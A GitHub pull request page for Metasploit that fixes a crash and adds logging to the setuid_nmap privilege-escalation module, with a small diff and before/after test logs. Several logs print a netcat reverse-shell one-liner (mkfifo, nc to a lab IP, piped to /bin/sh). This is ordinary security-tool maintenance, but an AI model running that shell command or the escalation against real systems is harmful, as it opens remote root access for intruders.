Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix crash and add additional logging to the setuid nmap module #15695

Merged
merged 1 commit into from
Sep 21, 2021
Merged

Fix crash and add additional logging to the setuid nmap module #15695

merged 1 commit into from
Sep 21, 2021

Conversation

adfoster-r7
Copy link
Contributor

Before

The module fails, there's no information why, and there's an miscellaneous NoMethodError error printed to the user:

msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/nkpLoovk.nse
[*] Running /tmp/nkpLoovk.nse with Nmap
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

After

The nmap command is now logged in verbose mode, and the NoMethodError has been fixed:

msf6 exploit(unix/local/setuid_nmap) > rerun session=-1 lhost=192.168.49.180 lport=80 verbose=true
[*] Reloading module...

[+] mkfifo /tmp/rujjoq; nc 192.168.49.180 80 0</tmp/rujjoq | /bin/sh >/tmp/rujjoq 2>&1; rm /tmp/rujjoq
[*] Started reverse TCP handler on 192.168.49.180:80 
[*] Dropping lua /tmp/fBIuDAnn.nse
[*] Running /tmp/fBIuDAnn.nse with Nmap
[*] 
Starting Nmap 7.40 ( https://nmap.org ) at 2021-09-20 20:47 EDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

sh: 1: nc: not found
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:622: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/fBIuDAnn.nse is missing required field: 'action'
stack traceback:
        [C]: in function 'error'
        /usr/bin/../share/nmap/nse_main.lua:622: in field 'new'
        /usr/bin/../share/nmap/nse_main.lua:820: in local 'get_chosen_scripts'
        /usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
        [C]: in ?

QUITTING!
[*] Exploit completed, but no session was created.

It's now clear to the user that nc isn't available and a different payload should be used.

Verification

Open a linux session on a target which has a setuid an nmap binary.

adfoster-r7
adfoster-r7 commented Sep 21, 2021
View reviewed changes
lib/msf/core/post/file.rb
@@ -181,6 +181,8 @@ def expand_path(path)
#
# @param path [String] Remote filename to check
def file?(path)
return false if path.nil?
Copy link
Contributor Author

@adfoster-r7 adfoster-r7 Sep 21, 2021
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

rm_rf was being called in the module with nil via rm_f(lua_file, exe_file). This was previously safe to do, but was broken recently by this change from exist? to file?

https://github.com/rapid7/metasploit-framework/pull/15403/files#diff-cc6585bd12e8d43e126c2e1a79e4132f56c1e180483f410ccbf90cfb04c5e5c8R478

@adfoster-r7 adfoster-r7 changed the title Improve setuid nmap module Fix crash and add additional logging to the setuid nmap module Sep 21, 2021
@space-r7 space-r7 self-assigned this Sep 21, 2021
@space-r7
Copy link
Contributor

This looks good to me! Tests before and after change:

Before

msf6 exploit(unix/local/setuid_nmap) > set session 1
session => 1
msf6 exploit(unix/local/setuid_nmap) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/udoXcsdM.nse
[*] Running /tmp/udoXcsdM.nse with Nmap
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

Module now reports that nmap is not installed instead of throwing an error.

msf6 exploit(unix/local/setuid_nmap) > run verbose=true

[+] mkfifo /tmp/lwldty; nc 192.168.140.1 4444 0</tmp/lwldty | /bin/sh >/tmp/lwldty 2>&1; rm /tmp/lwldty
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/tJOXGkhZ.nse
[*] Running /tmp/tJOXGkhZ.nse with Nmap
[*] /bin/sh: 1: /usr/bin/nmap: not found
[*] Exploit completed, but no session was created.

When netcat is unavailable:

msf6 exploit(unix/local/setuid_nmap) > run verbose=true

[+] mkfifo /tmp/zneeh; nc 192.168.140.1 4444 0</tmp/zneeh | /bin/sh >/tmp/zneeh 2>&1; rm /tmp/zneeh
[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Dropping lua /tmp/HDSxDqWg.nse
[*] Running /tmp/HDSxDqWg.nse with Nmap
[*] Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 11:59 PDT
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

WARNING: Running Nmap setgid, as you are doing, is a major security risk.

sh: 1: nc: not found
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:621: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/HDSxDqWg.nse is missing required field: 'action'
stack traceback:
	[C]: in function 'error'
	/usr/bin/../share/nmap/nse_main.lua:621: in field 'new'
	/usr/bin/../share/nmap/nse_main.lua:823: in local 'get_chosen_scripts'
	/usr/bin/../share/nmap/nse_main.lua:1310: in main chunk
	[C]: in ?

QUITTING!

@space-r7 space-r7 added the rn-fix release notes fix label Sep 21, 2021
@space-r7 space-r7 merged commit b24b6d8 into rapid7:master Sep 21, 2021
@space-r7
Copy link
Contributor

Release Notes

This fixes a crash in the exploit/unix/local/setuid_nmap module and adds logging to print the result of the exploit's last command so the user knows what happened in the event of a failure.

@space-r7 space-r7 added the bug label Sep 21, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@space-r7 space-r7

Labels
bug rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@adfoster-r7 @space-r7